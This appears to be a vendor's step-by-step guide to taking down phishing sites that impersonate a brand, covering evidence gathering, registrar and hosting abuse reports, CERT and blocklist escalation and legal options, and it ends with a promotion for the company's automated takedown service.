A practical, step-by-step guide to identifying the registrar, filing abuse reports, engaging hosting providers, and escalating to CERT teams when a phishing site targets your brand.
The moment you discover a phishing site targeting your brand, a clock starts. Industry research shows that the average phishing campaign reaches peak effectiveness within 4–6 hours of launch. After 24 hours, most attack operators voluntarily rotate to a new domain. The window for meaningful intervention is measured in hours — not the days or weeks that most corporate processes require. This guide covers the fastest path from discovery to confirmed removal.
Step 1: Gather Evidence Before Anything Else
Before contacting anyone, document everything. Phishing sites are ephemeral — operators frequently take them down and relaunch on new domains, destroying evidence. Take full-page screenshots with timestamps. Save the page source code. Record the WHOIS data for the domain. Note the IP address and hosting provider. If the site has a login form, document the form action URL (where stolen credentials are sent). This evidence package will be required for every enforcement request you file.
- Screenshot the live site with a visible URL bar and timestamp (use Wayback Machine's Save Page Now as a timestamped backup).
- Save the complete page source (Ctrl+U or curl the URL) — this preserves the credential exfiltration endpoint.
- Run a WHOIS lookup to identify the domain registrar and registration date.
- Perform a DNS lookup to identify the hosting provider's IP range and ASN.
- Check if the SSL certificate was issued by a recognized CA — if so, the CA can be notified as an additional enforcement vector.
Use urlscan.io to create a public, timestamped scan of the phishing site. This creates an immutable record that can be referenced in all subsequent abuse reports and legal filings.
Step 2: File an Abuse Report with the Registrar
The domain registrar is typically the fastest enforcement vector for phishing sites. Most major registrars (GoDaddy, Namecheap, Cloudflare, Google Domains) have dedicated abuse reporting channels that process phishing complaints within 2–4 hours. Your abuse report should include the phishing URL, evidence screenshots, the legitimate site URL for comparison, and your trademark registration details if applicable. Reference the registrar's Acceptable Use Policy and ICANN's RAA (Registrar Accreditation Agreement) provisions on fraudulent domain use.
"Most people file abuse reports with the hosting provider. That works — but the registrar is faster. Registrars can suspend the entire domain in one action, while hosting takedowns only affect one server and operators can re-point DNS within minutes."
Step 3: Notify the Hosting Provider
In parallel with the registrar report, file an abuse complaint with the hosting provider. Use the IP address from your DNS lookup to identify the provider (tools like IPinfo.io or the ARIN WHOIS database will resolve the IP to an organization). Most cloud providers — AWS, Google Cloud, Microsoft Azure, DigitalOcean — have abuse reporting forms that trigger automated review for phishing content. Include the same evidence package you prepared in Step 1.
Response times vary significantly by provider. AWS and Google Cloud typically respond within 2–4 hours for confirmed phishing. Budget hosting providers and offshore hosts can take 24–72 hours or may not respond at all. If the site is behind Cloudflare's CDN, you will need to file with both Cloudflare (which can reveal the origin IP) and the actual hosting provider.
Step 4: Engage CERT Teams for Critical Threats
- For financial services phishing: contact the Anti-Phishing Working Group (APWG) at reportphishing@apwg.org — they maintain direct relationships with registrars and browsers.
- For government or critical infrastructure impersonation: contact your national CERT (CERT-US, CERT-EU, CERT-UAE) who can issue emergency takedown requests.
- For browser-level blocking: submit the URL to Google Safe Browsing (safebrowsing.google.com) and Microsoft SmartScreen — this blocks the site in Chrome, Firefox, Safari, and Edge within hours.
- For search engine deindexing: file a removal request with Google and Bing to prevent the phishing site from appearing in search results.
When to Escalate Legally
If the registrar and hosting provider are unresponsive after 24 hours, or if the phishing operation is causing significant ongoing harm, legal escalation may be necessary. Emergency TRO (Temporary Restraining Order) applications can compel U.S.-based registrars and hosting providers to act immediately. For international domains, working with local counsel in the registrar's jurisdiction can accelerate the process. In the EU, the DSA (Digital Services Act) provides additional enforcement mechanisms with mandated response timelines.
EzlaScan automates this entire workflow. Our system detects phishing sites targeting protected brands within minutes of launch, files parallel enforcement requests with registrars, hosting providers, CERTs, and browser blocklists simultaneously, and escalates legally when automated channels fail. Median time from detection to confirmed takedown: 47 minutes.